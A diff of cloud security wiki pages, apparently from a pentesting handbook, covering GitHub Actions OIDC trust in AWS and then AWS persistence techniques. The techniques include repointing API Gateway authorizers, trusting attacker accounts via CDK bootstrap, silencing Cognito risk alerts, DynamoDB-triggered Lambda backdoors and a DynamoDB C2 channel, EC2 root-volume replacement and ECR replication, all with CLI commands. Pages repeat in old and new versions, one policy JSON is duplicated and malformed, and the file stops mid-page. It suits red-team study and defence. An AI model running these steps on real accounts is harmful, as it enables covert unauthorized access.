6. Note in the previous policy how only a **branch** from a **repository** of an **organization** was authorized with a specific **trigger**.
7. The **ARN** of the **role** the github action is going to be able to **impersonate** is going to be the "secret" the github action needs to know, so **store** it inside a **secret** inside an **environment**.
8. Finally use a github action to configure the AWS creds to be used by the workflow:
```yaml
name: "test AWS Access"

# The workflow should only trigger on pull requests to the main branch
on:
  pull_request:
    branches:
      - main

# Required to get the ID Token that will be used for OIDC
permissions:
  id-token: write
  contents: read # needed for private repos to checkout

jobs:
  aws:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v3

      - name: Configure AWS Credentials
        uses: aws-actions/configure-aws-credentials@v1
        with:
          aws-region: eu-west-1
          role-to-assume: ${{ secrets.READ_ROLE }}
          role-session-name: OIDCSession

      - run: aws sts get-caller-identity
        shell: bash
```
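The trust evaluation above boils down to exact string matching on the token's `sub` and `aud` claims. A minimal local sketch of that check (hypothetical helper, not AWS's real policy engine):

```python
# Mimics the StringEquals conditions of the trust policy above.
# ALLOWED_SUBS / ALLOWED_AUD mirror the policy's condition values.
ALLOWED_SUBS = [
    "repo:ORG_OR_USER_NAME/REPOSITORY:pull_request",
    "repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main",
]
ALLOWED_AUD = "sts.amazonaws.com"

def policy_allows(sub: str, aud: str) -> bool:
    # A StringEquals condition with a list matches if ANY listed value
    # equals the claim exactly (StringEquals does no globbing)
    return aud == ALLOWED_AUD and sub in ALLOWED_SUBS

print(policy_allows("repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main", "sts.amazonaws.com"))  # True
print(policy_allows("repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/dev", "sts.amazonaws.com"))   # False
```

Any token not matching both conditions (e.g. a workflow run from another branch) is rejected by `sts:AssumeRoleWithWebIdentity`.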
## OIDC - EKS Abuse
```bash
# Create an EKS cluster (~10min)
eksctl create cluster --name demo --fargate

# Create an Identity Provider for an EKS cluster
eksctl utils associate-iam-oidc-provider --cluster Testing --approve
```
It's possible to generate **OIDC providers** in an **EKS** cluster simply by setting the **OIDC URL** of the cluster as a **new Open ID Identity provider**. This is a common default policy:
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com"
}
}
}
]
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com"
}
}
}
]
}
```
This policy correctly indicates that **only** the **EKS cluster** with **id** `20C159CDF6F2349B68846BEC03BE031B` can assume the role. However, it's not indicating which service account can assume it, which means that **any service account with a web identity token** is going to be **able to assume** the role.
In order to specify **which service account should be able to assume the role**, a **condition** where the **service account name is specified** is needed, such as:
```bash
"oidc.eks.region-code.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:sub": "system:serviceaccount:default:my-service-account",
```
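As a sketch of what that condition buys you: the `sub` claim of an EKS service-account web identity token has the form `system:serviceaccount:<namespace>:<name>`, so pinning it restricts which service account matches (hypothetical helper for illustration, not AWS's evaluator):

```python
# Illustration only: without a ":sub" condition, ANY service-account token
# from the cluster satisfies the trust policy; pinning sub restricts it.
def sub_matches(sub: str, namespace: str, name: str) -> bool:
    # EKS web identity tokens carry sub = "system:serviceaccount:<ns>:<name>"
    return sub == f"system:serviceaccount:{namespace}:{name}"

print(sub_matches("system:serviceaccount:default:my-service-account",
                  "default", "my-service-account"))  # True
print(sub_matches("system:serviceaccount:kube-system:attacker-sa",
                  "default", "my-service-account"))  # False
```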
## References
- [https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/](https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/)
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -2,16 +2,20 @@
{{#include ../../banners/hacktricks-training.md}}
These are the permissions you need on each AWS account you want to audit to be able to run all the proposed AWS audit tools:
- The default policy **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess)
- To run [aws_iam_review](https://github.com/carlospolop/aws_iam_review) you also need the permissions:
- **access-analyzer:List\***
- **access-analyzer:Get\***
- **iam:CreateServiceLinkedRole**
- **access-analyzer:CreateAnalyzer**
- (Optional if the client generates the analyzers for you, but it's usually easier to just ask for this permission)
- **access-analyzer:DeleteAnalyzer**
- (Optional if the client removes the analyzers for you, but it's usually easier to just ask for this permission)
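The wildcard entries above (`access-analyzer:List*`, `access-analyzer:Get*`) expand IAM-glob style. A quick local sketch to check whether a given action is covered (hypothetical helper, not an IAM policy evaluator):

```python
# fnmatch gives IAM-style globbing for a rough local check of whether an
# action name is covered by the permission list above.
from fnmatch import fnmatch

GRANTED = [
    "access-analyzer:List*",
    "access-analyzer:Get*",
    "iam:CreateServiceLinkedRole",
    "access-analyzer:CreateAnalyzer",
    "access-analyzer:DeleteAnalyzer",
]

def is_allowed(action: str) -> bool:
    # Covered if the action matches any granted pattern (exact or wildcard)
    return any(fnmatch(action, pattern) for pattern in GRANTED)

print(is_allowed("access-analyzer:ListAnalyzers"))    # True
print(is_allowed("access-analyzer:StartResourceScan"))  # False
```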
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -1,3 +1,5 @@
# AWS - Persistence
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,36 @@
# AWS - API Gateway Persistence
{{#include ../../../banners/hacktricks-training.md}}
## API Gateway
For more information go to:
{{#ref}}
../aws-services/aws-api-gateway-enum.md
{{#endref}}
### Resource Policy
Modify the resource policy of the API gateway(s) to grant yourself access to them
### Modify Lambda Authorizers
Modify the code of lambda authorizers to grant yourself access to all the endpoints.\
Or just remove the use of the authorizer.
### IAM Permissions
If a resource is using an IAM authorizer you could give yourself access to it by modifying IAM permissions.\
Or just remove the use of the authorizer.
### API Keys
If API keys are used, you could leak them to maintain persistence or even create new ones.\
Or just remove the use of API keys.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,54 +0,0 @@
# AWS - API Gateway Persistence
{{#include ../../../../banners/hacktricks-training.md}}
## API Gateway
For more information go to:
{{#ref}}
../../aws-services/aws-api-gateway-enum.md
{{#endref}}
### Resource Policy
Modify the resource policy of the API gateway(s) to grant yourself access to them.
### Modify Lambda Authorizers
Modify the code of the lambda authorizers to grant yourself access to all the endpoints.\
Or just remove the use of the authorizer.
If you have control-plane permissions to **create/update an authorizer** (REST API: `aws apigateway update-authorizer`, HTTP API: `aws apigatewayv2 update-authorizer`), you can also **repoint the authorizer to a Lambda that always allows**.
REST APIs (changes usually require a deployment):
```bash
REGION="us-east-1"
REST_API_ID="<rest_api_id>"
AUTHORIZER_ID="<authorizer_id>"
LAMBDA_ARN="arn:aws:lambda:$REGION:<account_id>:function:<always_allow_authorizer>"
AUTHORIZER_URI="arn:aws:apigateway:$REGION:lambda:path/2015-03-31/functions/$LAMBDA_ARN/invocations"
aws apigateway update-authorizer --region "$REGION" --rest-api-id "$REST_API_ID" --authorizer-id "$AUTHORIZER_ID" --authorizer-uri "$AUTHORIZER_URI"
aws apigateway create-deployment --region "$REGION" --rest-api-id "$REST_API_ID" --stage-name "<stage>"
```
HTTP APIs / `apigatewayv2` (changes usually take effect immediately):
```bash
REGION="us-east-1"
API_ID="<http_api_id>"
AUTHORIZER_ID="<authorizer_id>"
LAMBDA_ARN="arn:aws:lambda:$REGION:<account_id>:function:<always_allow_authorizer>"
AUTHORIZER_URI="arn:aws:apigateway:$REGION:lambda:path/2015-03-31/functions/$LAMBDA_ARN/invocations"
aws apigatewayv2 update-authorizer --region "$REGION" --api-id "$API_ID" --authorizer-id "$AUTHORIZER_ID" --authorizer-uri "$AUTHORIZER_URI"
```
### IAM Permissions
If a resource is using an IAM authorizer you can give yourself access to it by modifying IAM permissions.\
Or just remove the use of the authorizer.
### API Keys
If API keys are used, you could leak them to maintain persistence or even create new ones.\
Or just remove the use of API keys.
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,25 @@
# AWS - Cloudformation Persistence
{{#include ../../../banners/hacktricks-training.md}}
## CloudFormation
For more information, access:
{{#ref}}
../aws-services/aws-cloudformation-and-codestar-enum.md
{{#endref}}
### CDK Bootstrap Stack
The AWS CDK deploys a CFN stack called `CDKToolkit`. This stack supports a `TrustedAccounts` parameter, which allows external accounts to deploy CDK projects into the victim account. An attacker can abuse this to grant themselves indefinite access to the victim account, either by using the AWS CLI to redeploy the stack with parameters, or by using the AWS CDK CLI.
```bash
# CDK
cdk bootstrap --trust 1234567890
# AWS CLI
aws cloudformation update-stack --stack-name CDKToolkit --use-previous-template --parameters ParameterKey=TrustedAccounts,ParameterValue=1234567890
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,23 +0,0 @@
# AWS - Cloudformation Persistence
{{#include ../../../../banners/hacktricks-training.md}}
## CloudFormation
For more information, access:
{{#ref}}
../../aws-services/aws-cloudformation-and-codestar-enum.md
{{#endref}}
### CDK Bootstrap Stack
The AWS CDK deploys a CFN stack called `CDKToolkit`. This stack supports a `TrustedAccounts` parameter, which allows external accounts to deploy CDK projects into the victim account. An attacker can abuse this to grant themselves indefinite access to the victim account, either by using the AWS CLI to redeploy the stack with parameters, or by using the AWS CDK CLI.
```bash
# CDK
cdk bootstrap --trust 1234567890
# AWS CLI
aws cloudformation update-stack --stack-name CDKToolkit --use-previous-template --parameters ParameterKey=TrustedAccounts,ParameterValue=1234567890
```
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,46 @@
# AWS - Cognito Persistence
{{#include ../../../banners/hacktricks-training.md}}
## Cognito
For more information, access:
{{#ref}}
../aws-services/aws-cognito-enum/
{{#endref}}
### User persistence
Cognito is a service that allows giving roles to unauthenticated and authenticated users and controlling a directory of users. Several different configurations can be altered to maintain some persistence, like:
- **Adding a User Pool** controlled by the user to an Identity Pool
- Give an **IAM role to an unauthenticated Identity Pool and allow Basic auth flow**
- Or to an **authenticated Identity Pool** if the attacker can login
- Or **improve the permissions** of the given roles
- **Create, verify & privesc** via attributes controlled users or new users in a **User Pool**
- **Allowing external Identity Providers** to login in a User Pool or in an Identity Pool
Check how to do these actions in
{{#ref}}
../aws-privilege-escalation/aws-cognito-privesc.md
{{#endref}}
### `cognito-idp:SetRiskConfiguration`
An attacker with this privilege could modify the risk configuration to be able to login as a Cognito user **without triggering any alarms**. [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) to see all the options:
```bash
aws cognito-idp set-risk-configuration --user-pool-id <pool-id> --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION}
```
By default this is disabled:
<figure><img src="https://lh6.googleusercontent.com/EOiM0EVuEgZDfW3rOJHLQjd09-KmvraCMssjZYpY9sVha6NcxwUjStrLbZxAT3D3j9y08kd5oobvW8a2fLUVROyhkHaB1OPhd7X6gJW3AEQtlZM62q41uYJjTY1EJ0iQg6Orr1O7yZ798EpIJ87og4Tbzw=s2048" alt=""><figcaption></figcaption></figure>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,40 +0,0 @@
# AWS - Cognito Persistence
{{#include ../../../../banners/hacktricks-training.md}}
## Cognito
For more information, access:
{{#ref}}
../../aws-services/aws-cognito-enum/
{{#endref}}
### User persistence
Cognito is a service that allows giving roles to unauthenticated and authenticated users and controlling a directory of users. Several different configurations can be altered to maintain some persistence, like:
- **Adding a User Pool** controlled by the user to an Identity Pool
- Give an **IAM role to an unauthenticated Identity Pool and allow Basic auth flow**
- Or to an **authenticated Identity Pool** if the attacker can login
- Or **improve the permissions** of the given roles
- **Create, verify & privesc** via attribute-controlled users or new users in a **User Pool**
- **Allowing external Identity Providers** to login in a User Pool or in an Identity Pool
Check how to do these actions in:
{{#ref}}
../../aws-privilege-escalation/aws-cognito-privesc/README.md
{{#endref}}
### `cognito-idp:SetRiskConfiguration`
An attacker with this privilege could modify the risk configuration to be able to login as a Cognito user **without triggering any alarms**. [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) to see all the options:
```bash
aws cognito-idp set-risk-configuration --user-pool-id <pool-id> --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION}
```
By default this is disabled:
<figure><img src="https://lh6.googleusercontent.com/EOiM0EVuEgZDfW3rOJHLQjd09-KmvraCMssjZYpY9sVha6NcxwUjStrLbZxAT3D3j9y08kd5oobvW8a2fLUVROyhkHaB1OPhd7X6gJW3AEQtlZM62q41uYJjTY1EJ0iQg6Orr1O7yZ798EpIJ87og4Tbzw=s2048" alt=""><figcaption></figcaption></figure>
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,67 @@
# AWS - DynamoDB Persistence
{{#include ../../../banners/hacktricks-training.md}}
### DynamoDB
For more information access:
{{#ref}}
../aws-services/aws-dynamodb-enum.md
{{#endref}}
### DynamoDB Triggers with Lambda Backdoor
Using DynamoDB triggers, an attacker can create a **stealthy backdoor** by associating a malicious Lambda function with a table. The Lambda function can be triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account.
```bash
# Create a malicious Lambda function
aws lambda create-function \
--function-name MaliciousFunction \
--runtime nodejs14.x \
--role <LAMBDA_ROLE_ARN> \
--handler index.handler \
--zip-file fileb://malicious_function.zip \
--region <region>
# Associate the Lambda function with the DynamoDB table as a trigger
aws dynamodbstreams describe-stream \
--table-name TargetTable \
--region <region>
# Note the "StreamArn" from the output
aws lambda create-event-source-mapping \
--function-name MaliciousFunction \
--event-source-arn <STREAM_ARN> \
--region <region>
```
To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function.
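A sketch of what such a backdoor Lambda handler could look like, assuming the standard DynamoDB Streams event shape (the `Command` attribute name is an illustrative assumption, and the handler only collects commands instead of running them):

```python
# Hypothetical backdoor handler sketch: a Lambda wired to the table's stream
# receives DynamoDB Streams records and could act on attacker-crafted items.
def handler(event, context=None):
    executed = []
    for record in event.get("Records", []):
        if record.get("eventName") in ("INSERT", "MODIFY"):
            # NewImage holds the item in DynamoDB attribute-value format
            new_image = record["dynamodb"].get("NewImage", {})
            cmd = new_image.get("Command", {}).get("S")
            if cmd:
                executed.append(cmd)  # a real backdoor would execute this
    return executed

# Minimal fake stream event for local testing
sample_event = {"Records": [{"eventName": "INSERT", "dynamodb": {
    "NewImage": {"CommandId": {"S": "cmd1"}, "Command": {"S": "whoami"}}}}]}
print(handler(sample_event))  # ['whoami']
```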
### DynamoDB as a C2 Channel
An attacker can use a DynamoDB table as a **command and control (C2) channel** by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands.
```bash
# Create a DynamoDB table for C2
aws dynamodb create-table \
--table-name C2Table \
--attribute-definitions AttributeName=CommandId,AttributeType=S \
--key-schema AttributeName=CommandId,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
--region <region>
# Insert a command into the table
aws dynamodb put-item \
--table-name C2Table \
--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
--region <region>
```
The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources.
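The polling loop can be sketched as follows; an in-memory dict stands in for the DynamoDB table, so this is a simulation rather than a working implant (a real one would call `get_item`/`put_item` via boto3):

```python
# Simulated C2 poller: the dict stands in for the C2Table items.
table = {"cmd1": {"Command": "id", "Result": None}}
seen = set()  # command IDs already executed by this implant

def poll_once():
    ran = []
    for cmd_id, item in table.items():
        if cmd_id not in seen:
            seen.add(cmd_id)
            # pretend execution and write the result back to the "table"
            item["Result"] = f"output of {item['Command']}"
            ran.append(cmd_id)
    return ran

print(poll_once())  # ['cmd1'] — first poll picks up the pending command
print(poll_once())  # [] — nothing new on the second poll
```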
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,59 +0,0 @@
# AWS - DynamoDB Persistence
{{#include ../../../../banners/hacktricks-training.md}}
### DynamoDB
For more information access:
{{#ref}}
../../aws-services/aws-dynamodb-enum.md
{{#endref}}
### DynamoDB Triggers with Lambda Backdoor
Using DynamoDB triggers, an attacker can create a **stealthy backdoor** by associating a malicious Lambda function with a table. The Lambda function is triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account.
```bash
# Create a malicious Lambda function
aws lambda create-function \
--function-name MaliciousFunction \
--runtime nodejs14.x \
--role <LAMBDA_ROLE_ARN> \
--handler index.handler \
--zip-file fileb://malicious_function.zip \
--region <region>
# Associate the Lambda function with the DynamoDB table as a trigger
aws dynamodbstreams describe-stream \
--table-name TargetTable \
--region <region>
# Note the "StreamArn" from the output
aws lambda create-event-source-mapping \
--function-name MaliciousFunction \
--event-source-arn <STREAM_ARN> \
--region <region>
```
To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function.
### DynamoDB as a C2 Channel
An attacker can use a DynamoDB table as a **command and control (C2) channel** by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands.
```bash
# Create a DynamoDB table for C2
aws dynamodb create-table \
--table-name C2Table \
--attribute-definitions AttributeName=CommandId,AttributeType=S \
--key-schema AttributeName=CommandId,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
--region <region>
# Insert a command into the table
aws dynamodb put-item \
--table-name C2Table \
--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
--region <region>
```
The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources.
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,58 @@
# AWS - EC2 Persistence
{{#include ../../../banners/hacktricks-training.md}}
## EC2
For more information check:
{{#ref}}
../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
{{#endref}}
### Security Group Connection Tracking Persistence
If a defender finds that an **EC2 instance was compromised** he will probably try to **isolate** the **network** of the machine. He could do this with an explicit **Deny NACL** (but NACLs affect the entire subnet), or by **changing the security group** so it doesn't allow **any kind of inbound or outbound** traffic.
If the attacker had a **reverse shell originated from the machine**, even if the SG is modified to not allow inbound or outbound traffic, the **connection won't be killed due to** [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.**
### EC2 Lifecycle Manager
This service allow to **schedule** the **creation of AMIs and snapshots** and even **share them with other accounts**.\
An attacker could configure the **generation of AMIs or snapshots** of all the images or all the volumes **every week** and **share them with his account**.
### Scheduled Instances
It's possible to schedule instances to run daily, weekly or even monthly. An attacker could schedule a machine with high privileges or interesting access that he can then connect to.
### Spot Fleet Request
Spot instances are **cheaper** than regular instances. An attacker could launch a **small spot fleet request for 5 years** (for example), with **automatic IP** assignment, a **user data** script that **sends the attacker the IP address when the spot instance starts**, and a **high privileged IAM role**.
### Backdoor Instances
An attacker could get access to the instances and backdoor them:
- Using a traditional **rootkit** for example
- Adding a new **public SSH key** (check [EC2 privesc options](../aws-privilege-escalation/aws-ec2-privesc.md))
- Backdooring the **User Data**
### **Backdoor Launch Configuration**
- Backdoor the used AMI
- Backdoor the User Data
- Backdoor the Key Pair
### VPN
Create a VPN so the attacker will be able to connect directly through it to the VPC.
### VPC Peering
Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,61 +0,0 @@
# AWS - EC2 Persistence
{{#include ../../../../banners/hacktricks-training.md}}
## EC2
For more information check:
{{#ref}}
../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
{{#endref}}
### Security Group Connection Tracking Persistence
If a defender finds that an **EC2 instance was compromised** he will probably try to **isolate** the **network** of the machine. He could do this with an explicit **Deny NACL** (but NACLs affect the entire subnet), or by **changing the security group** so it doesn't allow **any kind of inbound or outbound** traffic.
If the attacker had a **reverse shell originated from the machine**, even if the SG is modified to not allow inbound or outbound traffic, the connection won't be killed due to [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html).
### EC2 Lifecycle Manager
This service allows to **schedule** the **creation of AMIs and snapshots** and even **share them with other accounts**.\
An attacker could configure the **generation of AMIs or snapshots** of all the images or all the volumes **every week** and **share them with his account**.
### Scheduled Instances
It's possible to schedule instances to run daily, weekly or even monthly. An attacker could schedule a machine with high privileges or interesting access that he can then connect to.
### Spot Fleet Request
Spot instances are **cheaper** than regular instances. An attacker could launch a **small spot fleet request for 5 years** (for example), with **automatic IP** assignment, a **user data** script that **sends the attacker the IP address when the spot instance starts**, and a **high privileged IAM role**.
### Backdoor Instances
An attacker could get access to the instances and backdoor them:
- Using a traditional **rootkit** for example
- Adding a new **public SSH key** (check [EC2 privesc options](../../aws-privilege-escalation/aws-ec2-privesc/README.md))
- Backdooring the **User Data**
### **Backdoor Launch Configuration**
- Backdoor the used AMI
- Backdoor the User Data
- Backdoor the Key Pair
### EC2 ReplaceRootVolume Task (Stealth Backdoor)
Using `CreateReplaceRootVolumeTask`, replace the root EBS volume of a running instance with a volume built from an attacker-controlled AMI or snapshot. The instance keeps its ENIs, IPs and role; it effectively boots into malicious code while looking unchanged from the outside.
{{#ref}}
../aws-ec2-replace-root-volume-persistence/README.md
{{#endref}}
### VPN
Create a VPN so the attacker will be able to connect directly through it to the VPC.
### VPC Peering
Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC.
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -1,75 +0,0 @@
# AWS - EC2 ReplaceRootVolume Task (Stealth Backdoor / Persistence)
{{#include ../../../../banners/hacktricks-training.md}}
Abuse **ec2:CreateReplaceRootVolumeTask** to replace the root EBS volume of a running instance with a volume restored from an attacker-controlled AMI or snapshot. The instance reboots automatically and keeps running on the attacker-controlled root filesystem while preserving ENIs, private/public IPs, attached non-root volumes and the instance metadata/IAM role.
## Requirements
- The target instance is EBS-backed and running in the same region.
- A compatible AMI or snapshot: same architecture/virtualization/boot mode (and product codes, if any) as the target instance.
## Pre-checks
```bash
REGION=us-east-1
INSTANCE_ID=<victim instance>
# Ensure EBS-backed
aws ec2 describe-instances --region $REGION --instance-ids $INSTANCE_ID --query 'Reservations[0].Instances[0].RootDeviceType' --output text
# Capture current network and root volume
ROOT_DEV=$(aws ec2 describe-instances --region $REGION --instance-ids $INSTANCE_ID --query 'Reservations[0].Instances[0].RootDeviceName' --output text)
ORIG_VOL=$(aws ec2 describe-instances --region $REGION --instance-ids $INSTANCE_ID --query "Reservations[0].Instances[0].BlockDeviceMappings[?DeviceName==\`$ROOT_DEV\`].Ebs.VolumeId" --output text)
PRI_IP=$(aws ec2 describe-instances --region $REGION --instance-ids $INSTANCE_ID --query 'Reservations[0].Instances[0].PrivateIpAddress' --output text)
ENI_ID=$(aws ec2 describe-instances --region $REGION --instance-ids $INSTANCE_ID --query 'Reservations[0].Instances[0].NetworkInterfaces[0].NetworkInterfaceId' --output text)
```
## Replace root from an AMI (preferred)
```bash
IMAGE_ID=<attacker-controlled compatible AMI>
# Start task
TASK_ID=$(aws ec2 create-replace-root-volume-task --region $REGION --instance-id $INSTANCE_ID --image-id $IMAGE_ID --query 'ReplaceRootVolumeTaskId' --output text)
# Poll until state == succeeded
while true; do
STATE=$(aws ec2 describe-replace-root-volume-tasks --region $REGION --replace-root-volume-task-ids $TASK_ID --query 'ReplaceRootVolumeTasks[0].TaskState' --output text)
echo "$STATE"; [ "$STATE" = "succeeded" ] && break; [ "$STATE" = "failed" ] && exit 1; sleep 10;
done
```
Alternative using a snapshot:
```bash
SNAPSHOT_ID=<snapshot with bootable root FS compatible with the instance>
aws ec2 create-replace-root-volume-task --region $REGION --instance-id $INSTANCE_ID --snapshot-id $SNAPSHOT_ID
```
## Evidence / Verification
```bash
# Instance auto-reboots; network identity is preserved
NEW_VOL=$(aws ec2 describe-instances --region $REGION --instance-ids $INSTANCE_ID --query "Reservations[0].Instances[0].BlockDeviceMappings[?DeviceName==\`$ROOT_DEV\`].Ebs.VolumeId" --output text)
# Compare before vs after
printf "ENI:%s IP:%s\nORIG_VOL:%s\nNEW_VOL:%s\n" "$ENI_ID" "$PRI_IP" "$ORIG_VOL" "$NEW_VOL"
# (Optional) Inspect task details and console output
aws ec2 describe-replace-root-volume-tasks --region $REGION --replace-root-volume-task-ids $TASK_ID --output json
aws ec2 get-console-output --region $REGION --instance-id $INSTANCE_ID --latest --output text
```
Expected: ENI_ID and PRI_IP remain the same; the root volume ID changes from $ORIG_VOL to $NEW_VOL. The system boots with the filesystem from the attacker-controlled AMI/snapshot.
## Notes
- The API doesn't require you to stop the instance manually; EC2 orchestrates the reboot.
- By default, the replaced (old) root EBS volume is detached and kept in the account (DeleteReplacedRootVolume=false). This can be used for rollback; otherwise it must be deleted to avoid charges.
## Rollback / Cleanup
```bash
# If the original root volume still exists (e.g., $ORIG_VOL is in state "available"),
# you can create a snapshot and replace again from it:
SNAP=$(aws ec2 create-snapshot --region $REGION --volume-id $ORIG_VOL --description "Rollback snapshot for $INSTANCE_ID" --query SnapshotId --output text)
aws ec2 wait snapshot-completed --region $REGION --snapshot-ids $SNAP
aws ec2 create-replace-root-volume-task --region $REGION --instance-id $INSTANCE_ID --snapshot-id $SNAP
# Or simply delete the detached old root volume if not needed:
aws ec2 delete-volume --region $REGION --volume-id $ORIG_VOL
```
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,101 @@
# AWS - ECR Persistence
{{#include ../../../banners/hacktricks-training.md}}
## ECR
For more information check:
{{#ref}}
../aws-services/aws-ecr-enum.md
{{#endref}}
### Hidden Docker Image with Malicious Code
An attacker could **upload a Docker image containing malicious code** to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner.
### Repository Policy
Add a policy to a single repository granting yourself (or everybody) access to it:
```bash
aws ecr set-repository-policy \
--repository-name cluster-autoscaler \
--policy-text file:///tmp/my-policy.json
# With a .json such as
{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}
```
> [!WARNING]
> Note that ECR requires that users have **permission** to make calls to the **`ecr:GetAuthorizationToken`** API through an IAM policy **before they can authenticate** to a registry and push or pull any images from any Amazon ECR repository.
### Registry Policy & Cross-account Replication
It's possible to automatically replicate a registry to an external account by configuring cross-account replication, where you need to **indicate the external account** to which you want to replicate the registry.
<figure><img src="../../../images/image (79).png" alt=""><figcaption></figcaption></figure>
First, you need to give the external account access over the registry with a **registry policy** like:
```bash
aws ecr put-registry-policy --policy-text file://my-policy.json
# With a .json like:
{
"Sid": "asdasd",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::947247140022:root"
},
"Action": [
"ecr:CreateRepository",
"ecr:ReplicateImage"
],
"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
}
```
Then apply the replication config:
```bash
aws ecr put-replication-configuration \
--replication-configuration file://replication-settings.json \
--region us-west-2
# Having the .json a content such as:
{
"rules": [{
"destinations": [{
"region": "destination_region",
"registryId": "destination_accountId"
}],
"repositoryFilters": [{
"filter": "repository_prefix_name",
"filterType": "PREFIX_MATCH"
}]
}]
}
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,145 +0,0 @@
# AWS - ECR Persistence
{{#include ../../../../banners/hacktricks-training.md}}
## ECR
For more information check:
{{#ref}}
../../aws-services/aws-ecr-enum.md
{{#endref}}
### Hidden Docker Image with Malicious Code
An attacker could **upload a Docker image containing malicious code** to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner.
### Repository Policy
Add a policy to a single repository granting yourself (or everybody) access to it:
```bash
aws ecr set-repository-policy \
--repository-name cluster-autoscaler \
--policy-text file:///tmp/my-policy.json
# With a .json such as
{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}
```
> [!WARNING]
> Note that ECR requires users to have **permission** to call the **`ecr:GetAuthorizationToken`** API through an IAM policy **before they can authenticate** to a registry and push or pull any images from any Amazon ECR repository.
### Registry Policy & Cross-account Replication
It's possible to automatically replicate a registry to an external account by configuring cross-account replication, where you need to **indicate the external account** to which you want to replicate the registry.
<figure><img src="../../../images/image (79).png" alt=""><figcaption></figcaption></figure>
First, you need to give the external account access over the registry with a **registry policy** like:
```bash
aws ecr put-registry-policy --policy-text file://my-policy.json
# With a .json like:
